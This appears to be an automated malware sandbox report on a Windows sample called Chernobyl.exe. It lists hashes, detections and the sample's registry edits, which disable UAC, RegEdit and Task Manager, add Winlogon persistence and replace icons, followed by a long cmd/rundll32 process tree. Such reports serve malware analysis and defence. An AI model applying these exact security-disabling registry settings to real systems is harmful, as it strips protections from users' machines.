Analysis
max time kernel: 87s
max time network: 16s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 03-03-2024 02:34
Static task: static1
Behavioral task: behavioral1
Sample: Chernobyl.exe
Resource: win7-20240221-en
Errors
General
Target: Chernobyl.exe
Size: 418KB
MD5: 42d232a366705a95af9babb269a251b1
SHA1: 015b04d84cf13b8c93d11cc8c80a0f4571fb6847
SHA256: 97609ae0b6b53252439d92caf6261c32cad76a69c93047c336cc5c42b458af3d
SHA512: cc7a88709390ec82c94c587f2569c22c72a210298e14d77a0ad0ab633013d49af703d1fe77af904c272914885597442474a2c487d5a9bd2553de794a3ee1ce56
SSDEEP: 6144:MEgbPPJo0222222222222222222222222222222222222222222222222222222Z:LtH0ZOZzv4TatsNqaJx
Malware Config
Signatures
Contains code to disable Windows Defender (3 IoCs)
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource | yara_rule
- behavioral1/memory/1724-0-0x000000013F5A0000-0x000000013F60C000-memory.dmp | disable_win_def
- behavioral1/memory/1724-2-0x000000001BD00000-0x000000001BD80000-memory.dmp | disable_win_def
- behavioral1/memory/1724-4-0x000000001BD00000-0x000000001BD80000-memory.dmp | disable_win_def
Modifies WinLogon for persistence (2 TTPs, 1 IoC)
Processes: Chernobyl.exe
description | ioc | process
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, cluttscape.exe" | Chernobyl.exe
UAC bypass
Processes: Chernobyl.exe
description | ioc | process
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | Chernobyl.exe
Disables RegEdit via registry modification (1 IoC)
Processes: Chernobyl.exe
description | ioc | process
- Set value (int) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | Chernobyl.exe
Disables Task Manager via registry modification
Possible privilege escalation attempt (64 IoCs)
Processes: icacls.exe, takeown.exe
pid process (entries without a process name are listed bare, as in the report):
712 icacls.exe, 2776 icacls.exe, 4956 takeown.exe, 5152 takeown.exe, 5428 takeown.exe, 4248 takeown.exe, 3036 icacls.exe, 6244 takeown.exe,
7900, 2944, 2648 takeown.exe, 5260 takeown.exe, 3224 takeown.exe, 4620, 2864 icacls.exe, 6372 takeown.exe,
2588, 4312, 1852 icacls.exe, 2152 takeown.exe, 2576 icacls.exe, 4912 takeown.exe, 5496 icacls.exe, 6696,
2272 takeown.exe, 1656 icacls.exe, 2464 takeown.exe, 7016 takeown.exe, 7528 takeown.exe, 7164 takeown.exe, 656 takeown.exe, 7840,
752 takeown.exe, 1948 icacls.exe, 1636 takeown.exe, 740 takeown.exe, 5704 takeown.exe, 6348, 7588 takeown.exe, 2736,
2064 takeown.exe, 1364 icacls.exe, 2668 takeown.exe, 1700 icacls.exe, 6180 takeown.exe, 2008 takeown.exe, 1956 takeown.exe, 6164 takeown.exe,
1736 icacls.exe, 2960 takeown.exe, 2624 icacls.exe, 3312 icacls.exe, 6452 icacls.exe, 8184, 5308, 1144 icacls.exe,
756 icacls.exe, 2760 takeown.exe, 2876 icacls.exe, 6656 icacls.exe, 7864, 2008, 2868 takeown.exe, 1900 takeown.exe
Modifies file permissions (1 TTP, 64 IoCs)
Processes: icacls.exe, takeown.exe
pid process (entries without a process name are listed bare, as in the report):
5248 icacls.exe, 7572 icacls.exe, 5724, 1948 icacls.exe, 3588 takeown.exe, 7520 takeown.exe, 7556 icacls.exe, 5848,
1852 icacls.exe, 2644 takeown.exe, 2632 takeown.exe, 7604 takeown.exe, 7832, 5576 takeown.exe, 5132 takeown.exe, 1528 icacls.exe,
1900 takeown.exe, 1728 takeown.exe, 5456 takeown.exe, 4220, 1696 takeown.exe, 1608 icacls.exe, 2820 icacls.exe, 2776 icacls.exe,
3824 takeown.exe, 7488 icacls.exe, 1796, 1460 takeown.exe, 8076, 2172 takeown.exe, 4716 takeown.exe, 1676 icacls.exe,
2624 icacls.exe, 612 takeown.exe, 2688 takeown.exe, 4252 takeown.exe, 5460 takeown.exe, 3592 takeown.exe, 6308 takeown.exe, 2760 takeown.exe,
7400 takeown.exe, 7856, 3816, 5412 takeown.exe, 7040, 1448 takeown.exe, 1700 icacls.exe, 2776 icacls.exe,
7512 takeown.exe, 8168, 2152 takeown.exe, 108 icacls.exe, 2100 icacls.exe, 2956 takeown.exe, 6180 takeown.exe, 7284 takeown.exe,
1796 takeown.exe, 1688 icacls.exe, 4928 takeown.exe, 448, 1624 takeown.exe, 4220 takeown.exe, 2596, 4088 icacls.exe
Modifies system executable filetype association (2 TTPs, 3 IoCs)
Processes: Chernobyl.exe
description | ioc | process
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon | Chernobyl.exe
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | Chernobyl.exe
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Windows\\System32\\kill.ico" | Chernobyl.exe
Checks whether UAC is enabled
Processes: Chernobyl.exe
description | ioc | process
- Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | Chernobyl.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | Chernobyl.exe
Modifies WinLogon (2 TTPs, 2 IoCs)
Processes: Chernobyl.exe
description | ioc | process
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoRestartShell = "0" | Chernobyl.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\DisableCAD = "1" | Chernobyl.exe
Drops file in System32 directory (2 IoCs)
Processes: Chernobyl.exe
description | ioc | process
- File opened for modification | C:\Windows\System32\kill.ico | Chernobyl.exe
- File opened for modification | C:\Windows\System32\wallpaper.jpg | Chernobyl.exe
Drops file in Windows directory (2 IoCs)
Processes: Chernobyl.exe
description | ioc | process
- File created | C:\Windows\cluttscape.exe | Chernobyl.exe
- File opened for modification | C:\Windows\cluttscape.exe | Chernobyl.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Modifies File Icons (3 IoCs)
Processes: Chernobyl.exe
description | ioc | process
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\4 = "C:\\Windows\\System32\\kill.ico" | Chernobyl.exe
- Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons | Chernobyl.exe
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Icons\3 = "C:\\Windows\\System32\\kill.ico" | Chernobyl.exe
Modifies registry class (39 IoCs)
Processes: Chernobyl.exe
description | ioc | process (every entry is by Chernobyl.exe)

Set value (str) = "C:\\Windows\\System32\\kill.ico" on each of the following 28 keys:
- \REGISTRY\MACHINE\SOFTWARE\Classes\icofile\DefaultIcon\
- \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\DefaultIcon\
- \REGISTRY\MACHINE\SOFTWARE\Classes\JSEFile\DefaultIcon\
- \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon\
- \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon\
- \REGISTRY\MACHINE\SOFTWARE\Classes\ratfile\DefaultIcon\
- \REGISTRY\MACHINE\SOFTWARE\Classes\zapfile\DefaultIcon\
- \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon\
- \REGISTRY\MACHINE\SOFTWARE\Classes\jpegfile\DefaultIcon\
- \REGISTRY\MACHINE\SOFTWARE\Classes\JSFile\DefaultIcon\
- \REGISTRY\MACHINE\SOFTWARE\Classes\mscfile\DefaultIcon\
- \REGISTRY\MACHINE\SOFTWARE\Classes\regfile\DefaultIcon\
- \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\DefaultIcon\
- \REGISTRY\MACHINE\SOFTWARE\Classes\Unknown\DefaultIcon\
- \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\DefaultIcon\
- \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon\
- \REGISTRY\MACHINE\SOFTWARE\Classes\icmfile\DefaultIcon\
- \REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\DefaultIcon\
- \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\DefaultIcon\
- \REGISTRY\MACHINE\SOFTWARE\Classes\pjpegfile\DefaultIcon\
- \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon\
- \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\
- \REGISTRY\MACHINE\SOFTWARE\Classes\pnffile\DefaultIcon\
- \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\DefaultIcon\
- \REGISTRY\MACHINE\SOFTWARE\Classes\jntfile\DefaultIcon\
- \REGISTRY\MACHINE\SOFTWARE\Classes\dllfile\DefaultIcon\
- \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon\
- \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon\

Key created (11 entries):
- \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\DefaultIcon
- \REGISTRY\MACHINE\SOFTWARE\Classes\htlm\DefaultIcon
- \REGISTRY\MACHINE\SOFTWARE\Classes\htlm
- \REGISTRY\MACHINE\SOFTWARE\Classes\textfile\DefaultIcon
- \REGISTRY\MACHINE\SOFTWARE\Classes\jarfile\DefaultIcon
- \REGISTRY\MACHINE\SOFTWARE\Classes\sysfile\DefaultIcon
- \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\CLSID
- \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}
- \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon
- \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}
- \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\CLSID\{1248BD21-B584-4EB8-85D0-8EC479CD043B}\DefaultIcon
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Processes: Chernobyl.exe
pid | process
- 1724 | Chernobyl.exe (the same entry is repeated for all 64 IoCs)
Suspicious behavior: GetForegroundWindowSpam (1 IoC)
Processes: Chernobyl.exe
pid | process
- 1724 | Chernobyl.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes: Chernobyl.exe, takeown.exe
description | pid | process
- Token: SeDebugPrivilege | 1724 | Chernobyl.exe (2 entries)
- Token: SeTakeOwnershipPrivilege | takeown.exe, 62 entries with the following pids:
2272, 2972, 2064, 2628, 2448, 1012, 2760, 2772, 2464, 2696, 2548, 1792, 268, 1796, 2912, 568,
2868, 1456, 2920, 2276, 3048, 2788, 2592, 1564, 2620, 1580, 1704, 332, 1448, 1808, 2668, 1900,
2632, 1972, 3048, 1648, 2080, 2232, 908, 2776, 2528, 2008, 2460, 1624, 2960, 2780, 1732, 2632,
1516, 2616, 740, 1484, 976, 1564, 2648, 2220, 904, 2008, 2228, 108, 2692, 1700
Suspicious use of WriteProcessMemory (64 IoCs)
Processes: Chernobyl.exe, cmd.exe
description | pid | process | target process
Each row below appears three times in the report, except the last, which appears once (64 entries in total):
- PID 1724 wrote to memory of 1684 | 1724 | Chernobyl.exe | cmd.exe
- PID 1684 wrote to memory of 2860 | 1684 | cmd.exe | rundll32.exe
- PID 1724 wrote to memory of 2864 | 1724 | Chernobyl.exe | cmd.exe
- PID 1724 wrote to memory of 880 | 1724 | Chernobyl.exe | cmd.exe
- PID 2864 wrote to memory of 1212 | 2864 | cmd.exe | rundll32.exe
- PID 1724 wrote to memory of 2984 | 1724 | Chernobyl.exe | cmd.exe
- PID 880 wrote to memory of 2308 | 880 | cmd.exe | rundll32.exe
- PID 1724 wrote to memory of 2276 | 1724 | Chernobyl.exe | cmd.exe
- PID 2984 wrote to memory of 2840 | 2984 | cmd.exe | rundll32.exe
- PID 1724 wrote to memory of 2244 | 1724 | Chernobyl.exe | cmd.exe
- PID 1724 wrote to memory of 2288 | 1724 | Chernobyl.exe | cmd.exe
- PID 2276 wrote to memory of 692 | 2276 | cmd.exe | rundll32.exe
- PID 2244 wrote to memory of 896 | 2244 | cmd.exe | rundll32.exe
- PID 1724 wrote to memory of 1072 | 1724 | Chernobyl.exe | cmd.exe
- PID 2288 wrote to memory of 2912 | 2288 | cmd.exe | rundll32.exe
- PID 1072 wrote to memory of 1792 | 1072 | cmd.exe | rundll32.exe
- PID 1724 wrote to memory of 1452 | 1724 | Chernobyl.exe | cmd.exe
- PID 1452 wrote to memory of 1864 | 1452 | cmd.exe | rundll32.exe
- PID 1724 wrote to memory of 3032 | 1724 | Chernobyl.exe | cmd.exe
- PID 1724 wrote to memory of 448 | 1724 | Chernobyl.exe | cmd.exe
- PID 3032 wrote to memory of 3036 | 3032 | cmd.exe | rundll32.exe
- PID 448 wrote to memory of 2364 | 448 | cmd.exe | rundll32.exe
System policy modification (1 TTP, 3 IoCs)
Processes: Chernobyl.exe
description | ioc | process
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" | Chernobyl.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\UseDefaultTile = "1" | Chernobyl.exe
- Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | Chernobyl.exe
Processes

1. C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe (PID 1724)
   Command line: "C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe"
   Signatures:
   - Modifies WinLogon for persistence
   - UAC bypass
   - Disables RegEdit via registry modification
   - Modifies system executable filetype association
   - Checks whether UAC is enabled
   - Modifies WinLogon
   - Drops file in System32 directory
   - Drops file in Windows directory
   - Modifies File Icons
   - Modifies registry class
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious behavior: GetForegroundWindowSpam
   - Suspicious use of AdjustPrivilegeToken
   - Suspicious use of WriteProcessMemory
   - System policy modification

2. Children of PID 1724. Every child is a cmd.exe instance started with the same command line:
   C:\Windows\System32\cmd.exe
   Command line: "C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit

3. Each cmd.exe in turn started one rundll32.exe child:
   C:\Windows\system32\rundll32.exe
   Command line: RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

   cmd.exe PID -> rundll32.exe PID (signature on the cmd.exe instance, where the report lists one):
   - 1684 -> 2860 (Suspicious use of WriteProcessMemory)
   - 2864 -> 1212 (Suspicious use of WriteProcessMemory)
   - 880 -> 2308 (Suspicious use of WriteProcessMemory)
   - 2984 -> 2840 (Suspicious use of WriteProcessMemory)
   - 2276 -> 692 (Suspicious use of WriteProcessMemory)
   - 2244 -> 896 (Suspicious use of WriteProcessMemory)
   - 2288 -> 2912 (Suspicious use of WriteProcessMemory)
   - 1072 -> 1792 (Suspicious use of WriteProcessMemory)
   - 1452 -> 1864 (Suspicious use of WriteProcessMemory)
   - 3032 -> 3036 (Suspicious use of WriteProcessMemory)
   - 448 -> 2364 (Suspicious use of WriteProcessMemory)
   - 848 -> 1920
   - 976 -> 1732
   - 1932 -> 2920
   - 960 -> 2208
   - 2092 -> 2324
   - 1456 -> 2108
   - 2536 -> 1632
   - 2268 -> 1696
   - 2192 -> 3028
   - 3044 -> 384
   - 1888 -> 2592
   - 2152 -> 1996
   - 2740 -> 2760
   - 2604 -> 2456
   - 748 -> 752
   - 1092 -> 2780
   - 2120 -> 3016
   - 1624 -> 2564
   - 2772 -> 2776
   - 2500 -> 1968
   - 2964 -> 2976
   - 1688 -> 2688
   - 2720 -> 2692
   - 2796 -> 2828
   - 2824 -> 312
   - 2832 -> 2368
   - 1876 -> 1740
   - 1904 -> 1380
   - 2184 -> 2960
   - 1280 -> 1972
   - 1936 -> 2840
   - 2868 -> 2112
   - 2300 -> 612
   - 268 -> 1072
   - 1328 -> 1588
   - 2256 -> 2672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3008
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3024
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2364
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1712
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1304
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1312
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2056
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1264
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:568
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2876
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:820
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2172
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1544
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3028
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:924
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2752
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2064
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:736
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1144
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:3016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3044
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2872
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:904
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2516
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2640
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2272
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2620
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1912
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2700
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2792
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2628
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:108
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:776
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2860
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2960
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2184
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1688
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2464
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2820
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1936
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2128
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:336
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2320
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2244
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1940
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:3024
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2892
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1804
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2136
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:856
-
-
-
